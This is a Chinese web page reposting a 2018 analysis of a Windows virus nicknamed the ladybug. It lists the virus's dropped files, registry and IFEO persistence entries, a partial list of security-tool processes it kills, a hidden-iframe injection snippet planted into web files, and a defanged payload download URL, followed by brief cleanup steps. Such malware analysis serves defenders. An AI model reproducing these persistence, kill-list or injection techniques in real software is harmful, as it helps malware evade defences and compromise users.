鸿 网 互 联 www.68idc.cn

小瓢虫~推荐

来源:互联网 作者:佚名 时间:2018-02-25 10:26
AUTORUN.INF 149 字节, RHS Recycleds.url 98 字节, A(回收站图标) SDGames.exe 59282 字节, RHS Windows.url 97 字节, A 新建文件夹.url 97 字节, A(文件夹图标)在生成AUTORUN.INF前,会先调用RD命令删除免疫的AUTORUN.INF(如果有)2、添加启动项:(1
  AUTORUN.INF 149 字节, RHS
Recycleds.url 98 字节, A(回收站图标)
SDGames.exe 59282 字节, RHS
Windows.url 97 字节, A
新建文件夹.url 97 字节, A(文件夹图标)   在生成AUTORUN.INF前,会先调用RD命令删除免疫的AUTORUN.INF(如果有)   2、添加启动项:   (1)HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
  注册表值 Winstary = "C:\windows\system32\SDGames.exe"   (2)修改system.ini,加入Load和Run值:   路径为:C:\windows\system32\SDGames.exe   3、开启以下服务:   winmgmt  lanmanserver   禁用以下服务:   sharedaccess   4、禁用一些系统功能,比如显示隐藏文件、扩展名、任务管理器、CMD等。   5、修改Reg、Txt文件关联,为:C:\windows\system32\SDGames.exe。   6、IFEO重定向劫持,指向:C:\windows\system32\SDGames.exe。   都是一些比较有名气的安全工具,另外连QQ和影子进程都不放过。   7、Avpser.cmd则尝试关闭一些进程(列一部分):   %p% RavMonD.exe
%p% RavStub.exe
%p% Anti*
%p% AgentSvr*
%p% CCenter*
%p% Rsaupd*
%p% KvReport*
%p% KvXP*
%p% KVMonXP*
%p% nter*
%p% TrojDie*
%p% avp.com
%p% KRepair.COM
%p% Trojan*
%p% avp.exe
%p% PFW.exe
%p% rising*
%p% ikaka*
%p% .duba*
%p% kingsoft*
%p% 木马*
%p% 社区*
%p% aswBoot*
%p% MainCon*
%p% Regs*
%p% AVP*
%p% Task*
%p% regedit*
%p% Ras*
%p% srgui*
%p% norton*
%p% avp*
%p% fire*
%p% spy*
%p% bullguard*
%p% PersFw*
%p% KAV*
%p% ZONEALARM*
%p% SAFEWEB*
%p% OUTPOST*
%p% ESAFE*
%p% clear*
%p% MonsysNT.exe
%p% awrem32.exe
%p% WINAW32.EXE
%p% PNTIOMON.exe
%p% avgw.exe
%p% avgcc32.exe
%p% PROmon.exe
%p% PNTIOMON.exe
%p% MagicSet.exe
%p% MainCon.exe
%p% TrCleaner.exe
%p% WmNetPro.exe
%p% 修复*
%p% 保护*   8、添加Guest账户,为空密码,权限为Administrator。   9、修改系统时间,为2030年。   10、通过直接获得系统内存隐藏进程,防止被结束。   11、释放Taskeep.vbs,这个应该互斥体,防止进程有多个病毒体在运行。   12、结束explorer.exe进程,并ping127.0.0.1,如果通畅,会下载一个文件,然后重新启动explorer:   hxxp://**.icpcn.com/QQ.gif   其实是个PE文件,具体是什么病毒还没看,不过测试时没有实现。   13、查找:   .jsp
.asp
.php
.htm
.html
.hta   并插入一段代码:   iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0"   src="hxxp://zh**.10mb.cn/" name="Myframe" align="center" border="0"   一个伪装百度的网站,不过下面挂了一个东西:   hxxp://xxx.bao01.com/0.js,失效了~~   14、修改IE主页,为hxxp://**.10mb.cn/。   15、跳过C盘,然后覆盖EXE文件。。(不可能恢复),图标为瓢虫模样。   16、还有一些乱七八糟的,就不写了~   另外这病毒传播方式不是很理想,所以不写解决方法了~   很麻烦滴~     1、把SDGame.exe和一些重要的文件覆盖并阻止再生。可以用PowerRmv。   建议暂时删除系统文件taskkill.exe、net.exe、cmd.exe。等弄好后从Dllcache恢复。   不然你会发现计算机响应的速度让你无法忍受。 4核的忽略这步   2、修正系统时间,再下载SREng修改被禁用的XX...   3、那些EXE只能删除了。                    
网友评论
<